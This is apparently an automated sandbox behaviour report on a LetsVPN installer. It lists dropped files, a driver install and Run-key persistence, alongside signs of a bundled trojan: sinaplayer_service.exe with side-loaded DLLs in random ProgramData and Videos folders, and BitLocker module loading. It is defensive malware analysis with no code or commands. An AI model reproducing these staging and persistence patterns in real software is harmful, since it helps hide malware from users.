              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.AccessControl.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Timer.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.Analytics.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\ToastNotifications.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Expression.Interactions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.Specialized.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\it\System.Web.Services.Description.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.AppContext.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.NonGeneric.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Encoding.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\DeltaCompressionDotNet.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\zh-SG\LetsPRO.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\SVGImage.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.SecureString.dllJump to dropped file
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeFile created: C:\Users\user\AppData\Local\Temp\{9d4cf18c-09fd-0e44-8812-c8157ed143b2}\SETBAE5.tmpJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Users\user\AppData\Local\Temp\nsmFF73.tmp\System.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.PerformanceCounter.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Web.WebView2.Wpf.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Handles.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Pdb.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.X509Certificates.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Serialization.Xml.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Globalization.Calendars.dllJump to dropped file
              Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{e2ac460a-1ae4-2d4c-8bd6-d2159bd65866}\tap0901.sys (copy)Jump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.Security.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\zh-CN\LetsPRO.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\DeltaCompressionDotNet.MsDelta.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.WebHeaderCollection.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\pl\System.Web.Services.Description.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLite-net.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\CommunityToolkit.Mvvm.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XmlDocument.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Numerics.Vectors.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Contracts.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Users\user\AppData\Local\Temp\nsmFF73.tmp\nsProcess.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\de\System.Web.Services.Description.resources.dllJump to dropped file
              Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\drivers\tap0901.sys (copy)Jump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Pipes.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\runtimes\win-x86\native\e_sqlite3.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLiteNetExtensionsAsync.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\zh-HK\LetsPRO.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\PusherClient.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.NameResolution.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\fr\System.Web.Services.Description.resources.dllJump to dropped file
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeFile created: C:\Users\user\Videos\24D30D1C~16\msvcp120.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\arm64\WebView2Loader.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Tasks.Extensions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Requests.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\WebSocket4Net.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Tasks.Parallel.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.CodeDom.dllJump to dropped file
              Source: C:\Users\user\Desktop\letsVPN.exeFile created: C:\ProgramData\letsvpn-latest.exeJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\es\System.Web.Services.Description.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.IsolatedStorage.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Rocks.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.nativelibrary.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Resources.ResourceManager.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\ru\LetsPRO.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.EventBasedAsync.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Debug.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.Http.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\ndp462-web.exeJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.batteries_v2.dllJump to dropped file
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeFile created: C:\Users\user\Videos\24D30D1C~16\base.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.SystemEvents.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.TraceSource.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Drawing.Primitives.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsVPNDomainModel.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\NuGet.Squirrel.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\zh-MO\LetsPRO.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.WebSockets.Client.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Principal.Windows.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.ThreadPool.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\FontAwesome.WPF.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Claims.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Squirrel.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.Annotations.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Overlapped.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.NetTcp.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Toolkit.Uwp.Notifications.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.NetworkInformation.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.FileSystem.Watcher.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.core.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.OleDb.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLiteNetExtensions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Principal.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\Update.exeJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.CompilerServices.VisualC.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\pt-BR\System.Web.Services.Description.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\x86\WebView2Loader.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Compression.ZipFile.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.dllJump to dropped file
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeFile created: C:\Users\user\AppData\Local\Temp\{9d4cf18c-09fd-0e44-8812-c8157ed143b2}\tap0901.sys (copy)Jump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.MemoryMappedFiles.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Linq.Queryable.dllJump to dropped file
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeFile created: C:\Users\user\Videos\24D30D1C~16\msvcr120.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\cs\System.Web.Services.Description.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Serialization.Json.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.provider.dynamic_cdecl.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Bcl.AsyncInterfaces.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.Primitives.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Reflection.Primitives.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.Primitives.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\microsoft.identitymodel.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.Odbc.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Reflection.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsGoogleAnalytics.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Compression.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Reflection.Extensions.dllJump to dropped file
              Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\drivers\SETC543.tmpJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Sockets.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Utils.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\libwin.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\uninst.exeJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.Syndication.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Process.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\netstandard.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Globalization.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\SharpCompress.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Numerics.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Primitives.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XDocument.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\ToastNotifications.Messages.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Tools.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Packaging.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Pkcs.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.AccessControl.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Cng.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.WebSockets.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Security.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Management.Automation.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Dynamic.Runtime.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\zh-Hant\System.Web.Services.Description.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.UnmanagedMemoryStream.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Mdb.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Thread.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Text.Encoding.Extensions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\MdXaml.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\runtimes\win-x64\native\e_sqlite3.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Pipes.AccessControl.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Newtonsoft.Json.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Ping.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Linq.Parallel.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.TypeConverter.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.FileVersionInfo.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\driver\tap0901.sysJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ObjectModel.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\ja\System.Web.Services.Description.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Algorithms.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\ko\System.Web.Services.Description.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\tr\System.Web.Services.Description.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Text.Encoding.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XmlSerializer.dllJump to dropped file
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeFile created: C:\Users\user\Videos\24D30D1C~16\Gztcrf.exeJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.Primitives.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Configuration.ConfigurationManager.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Serialization.Formatters.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Http.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\zh-Hans\System.Web.Services.Description.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Text.Encoding.CodePages.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Web.WebView2.WinForms.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.Concurrent.dllJump to dropped file
              Source: C:\Users\user\Desktop\letsVPN.exeFile created: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsVPNInfraStructure.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Resources.Writer.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.FileSystem.Primitives.dllJump to dropped file
              Source: C:\Windows\System32\cmd.exeFile created: C:\ProgramData\0zVlL\Jd0i4~16\base.dllJump to dropped file
              Source: C:\Users\user\Desktop\letsVPN.exeFile created: C:\ProgramData\0zVlL\Jd0i4~16\sJump to dropped file
              Source: C:\Users\user\Desktop\letsVPN.exeFile created: C:\ProgramData\0zVlL\Jd0i4~16\FileSplit.exeJump to dropped file
              Source: C:\Users\user\Desktop\letsVPN.exeFile created: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeJump to dropped file
              Source: C:\Users\user\Desktop\letsVPN.exeFile created: C:\ProgramData\0zVlL\Jd0i4~16\msvcr120.dllJump to dropped file
              Source: C:\Users\user\Desktop\letsVPN.exeFile created: C:\ProgramData\0zVlL\Jd0i4~16\msvcp120.dllJump to dropped file
              Source: C:\Users\user\Desktop\letsVPN.exeFile created: C:\ProgramData\letsvpn-latest.exeJump to dropped file
              Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\drivers\tap0901.sys (copy)Jump to dropped file
              Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{e2ac460a-1ae4-2d4c-8bd6-d2159bd65866}\tap0901.sys (copy)Jump to dropped file
              Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\drivers\SETC543.tmpJump to dropped file
              Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{e2ac460a-1ae4-2d4c-8bd6-d2159bd65866}\SETBC5C.tmpJump to dropped file
              Source: C:\Users\user\Desktop\letsVPN.exeFile created: C:\ProgramData\0zVlL\Jd0i4~16\sJump to dropped file
              Source: C:\Windows\System32\drvinst.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tap0901
              Source: C:\Windows\System32\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\letsvpn
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\letsvpn\LetsVPN.lnk
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\letsvpn\Uninstall.lnk
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LetsPRO
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LetsPRO

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
